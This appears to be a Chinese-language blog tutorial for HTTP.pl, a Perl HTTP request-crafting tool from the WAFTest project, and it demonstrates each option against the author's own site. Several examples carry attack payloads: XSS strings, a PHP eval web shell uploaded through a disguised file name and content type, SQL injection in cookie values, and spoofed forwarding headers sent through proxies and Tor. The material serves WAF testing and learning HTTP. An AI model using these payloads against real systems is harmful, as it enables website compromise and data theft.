(2)HTTP协议相关部分:构造请求,发送请求,及解析响应use URI;
use URI::Split qw(uri_split uri_join);
use URI::Escape;
use LWP::UserAgent;
use HTTP::Headers;
use HTTP::Cookies;
use HTTP::Request::Common;
git clone https://github.com/tanjiti/WAFTest
cpan App::cpanminus
cat requirePackage.txt | cpanm
perl HTTP.pl --help
-help 帮助选项
-url 'http://xxxx.xx.com' HTTP请求的URL
-m|method GET|POST|HEAD HTTP请求方法,默认为GET方法
-H|header X-Forwarded-For='127.0.0.1, 127.0.0.2' -H Via='Squid' HTTP请求头
-cookie usertrack='123456' -b hit=1 HTTP cookie
-d|data name='tanjiti' -d passwd=12345 HTTP 查询字符串/post表单数据
-A|user-agent 'baiduspider' HTTP UserAgent,默认值 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
-e|referer 'http://www.baidu.com' HTTP Referer
-proxy 'http://64.34.14.28:7808' 代理,支持https,http,socks代理
-t|timeout 180 请求超时时间,默认值180s
-L|redirect 7 重定向次数,默认值7次
-F|fileUpload 表明本次请求为文件上传
-fileFiled 'uploaded' 文件域name
-filePath '/tmp/a.jpeg' 本地文件路径
-fileName 'a.php' 上传文件名
-fileContent '<?php eval($_POST[a]);?>' 上传文件内容
-fileType 'image/jpeg' 上传文件类型
-s|silent : 隐藏http完整内容,只显示http响应消息
-r|raw : 表明采用未进行urlencode编码的方式提交post数据
-basicAuth : 表明此次请求为HTTP基本认证
-username tanjiti 基本认证用户名
-password 12345 基本认证密码
./HTTP.pl -url http://www.tanjiti.com/redirect.php -L 0
data:image/s3,"s3://crabby-images/c681a/c681a03cf5b4de239ba0718897bf2b999874d149" alt="HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体 HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com/redirect.php -L 1
data:image/s3,"s3://crabby-images/298f9/298f9884be97a3103ea6c746a652530cb9ab10ab" alt="HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体 HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体"
-username tanjiti 基本认证用户名
-password 12345 基本认证密码
./HTTP.pl -url http://www.tanjiti.com/xxx/
data:image/s3,"s3://crabby-images/1e0c3/1e0c3d22e3b47674484927c378736fa6878abe28" alt="HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体 HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com/xxx/ -basicAuth -username tanjiti -password q
data:image/s3,"s3://crabby-images/c773c/c773ca9af043d72810861a2df8c866076402e30a" alt="HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体 HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com/get.php -d keyword='name<script>alert(1)</script>' -d submit='submit'
data:image/s3,"s3://crabby-images/6d0d2/6d0d2a6d7d443a550d7a5ca6fda2465bc7ef35c4" alt="HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体 HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体"
选项
-d 提交数据
-method 指定HTTP请求方法
-raw 是否进行urlencode编码
(1)提交urlencode编码./HTTP.pl -url http://www.tanjiti.com/get.php -d keyword='name<script>alert(1)</script>' -d submit='submit' -method post
data:image/s3,"s3://crabby-images/06d48/06d48be2230f51840319f906a91652d3b6d7a6d4" alt="HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体 HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com/get.php -d keyword='name<script>alert(1)</script>' -d submit='submit' -method post -raw
data:image/s3,"s3://crabby-images/d971e/d971ef06eb7b5be0e4260cd5233973bd6bd67e59" alt="HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体 HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体"
-filePath '/tmp/a.jpeg' 本地文件路径
-fileName 'a.php' 上传文件名
-fileContent '<?php eval($_POST[a]);?>' 上传文件内容
-fileType 'image/jpeg' 上传文件类型
data:image/s3,"s3://crabby-images/e59bb/e59bb8a4e5c67df2e49507c98545abb38de3b044" alt="HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体 HTTP.pl——HTTP发包工具 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com/fileUpload.php -fileUpload -fileFiled uploaded -d upload=upload -filePath "/tmp/phpinfo.php"
data:image/s3,"s3://crabby-images/d6971/d6971d68bf872d7ef41e9527a376082989b70708" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com/fileUpload.php -fileUpload -fileFiled uploaded -d upload=upload -filePath "/tmp/king.jpeg"
data:image/s3,"s3://crabby-images/1c8ba/1c8bab820cb8344b291fba678de3676da06c1211" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com/fileUpload.php -fileUpload -fileFiled uploaded -d upload=upload -filePath "/tmp/phpinfo.php" -fileName '1.jpg .php' -fileType 'image/jpeg'
data:image/s3,"s3://crabby-images/eb908/eb908c0377e4373938c9c8a017b299997a198228" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com/fileUpload.php -fileUpload -fileFiled uploaded -d upload=upload -fileName 'avator.jpeg' -fileType 'image/jpeg' -fileContent '<?php @eval($_POST[a]);?>'
data:image/s3,"s3://crabby-images/d6bd8/d6bd872292e36e463f93ddfe3d70f9981069cec4" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
选项
-cookie
./HTTP.pl -url http://www.tanjiti.com/a.php -cookie username="tanjiti' or ''= '' -- " -cookie password='1 or 1=1 --'
data:image/s3,"s3://crabby-images/36c90/36c909bcf0921a45455230779841f5c342e8d797" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
User-Agent 脚本中默认为 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Referer 用户是从这个页面上依照链接跳转过来的
Host
Accept 告知服务器发送何种媒体类型,脚本中默认为text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Charset e.g. utf-8 告知服务器发送何种字符集
Accept-Encoding 告知服务器采用何种编码,脚本中默认为gzip,deflate,sdch
Accept-Language 告知服务器采用何种语言,脚本中默认为 zh-CN,zh;q=0.8,en;q=0.6
X_Forwarded_For 经过的客户端IP地址
Via 代理服务器标识
(1) 指定UserAgent选项
-A 或者-user-agent
./HTTP.pl -url http://www.tanjiti.com -A 'tanjiti'
data:image/s3,"s3://crabby-images/d2d1e/d2d1e43fd06b9d6d5da0101070f8e16217ada272" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
选项
-e 或者-referer
./HTTP.pl -url http://www.tanjiti.com -e 'http://www.google.com'
data:image/s3,"s3://crabby-images/ec398/ec3982ac569b87a66abf3cda229fc243d4365b39" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
(3)指定HTTP头
./HTTP.pl -url http://127.0.0.1 -H Accept='*/*' -H Accept-Charset='utf-8' -H Accept-Encoding='identity' -H Accept-Language='zh-CN,zh;q=0.8,en;q=0.6' -H Host='www.tanjiti.com' -H Via='1.0 tanjiit.com(squid 0.54)' -H X-Forwarded-For='129.78.138.66, 129.78.64.103'
data:image/s3,"s3://crabby-images/8f5a4/8f5a4d5bf7f14944a6c6a8db8ae8362ce8a2a9d8" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
./HTTP.pl -url http://www.tanjiti.com -proxy http://61.158.219.226:8118
(2) 使用tor/socks代理
./HTTP.pl -url http://www.tanjiti.com -proxy socks://127.0.0.1:9050
./HTTP.pl -url http://www.tanjiti.com -proxy socks://180.153.139.246:8888
(2)指定请求超时时间,默认为180s./HTTP.pl -url http://www.tanjiti.com/a.php -s
四、HTTPFromFile.pl./HTTP.pl -url http://www.tanjiti.com/ -t 20
echo -ne 'GET /?a=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1\r\nHost: www.tanjiti.com\r\nUserAgent: curl 0.9\r\n' > xss.t
data:image/s3,"s3://crabby-images/c0973/c09739a2cb7b4d628e642027b775d668f1c5dae2" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
perl HTTPFromFile.pl -code 403 -host www.tanjiti.com -port 80 -file xss.t
data:image/s3,"s3://crabby-images/3fb45/3fb4503807692796d33deb74715857b0dfd671d9" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"
-dir 指定存放请求包内容的文件目录perl HTTPFromFile.pl -host www.tanjiti.com -dir ~/WAFTest/t
data:image/s3,"s3://crabby-images/761d2/761d2584adce93cda7850572ddfca5e192427d3f" alt="HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体 HTTP.pl——通过HTTP发包工具了解HTTP协议 - 碳基体 - 碳基体"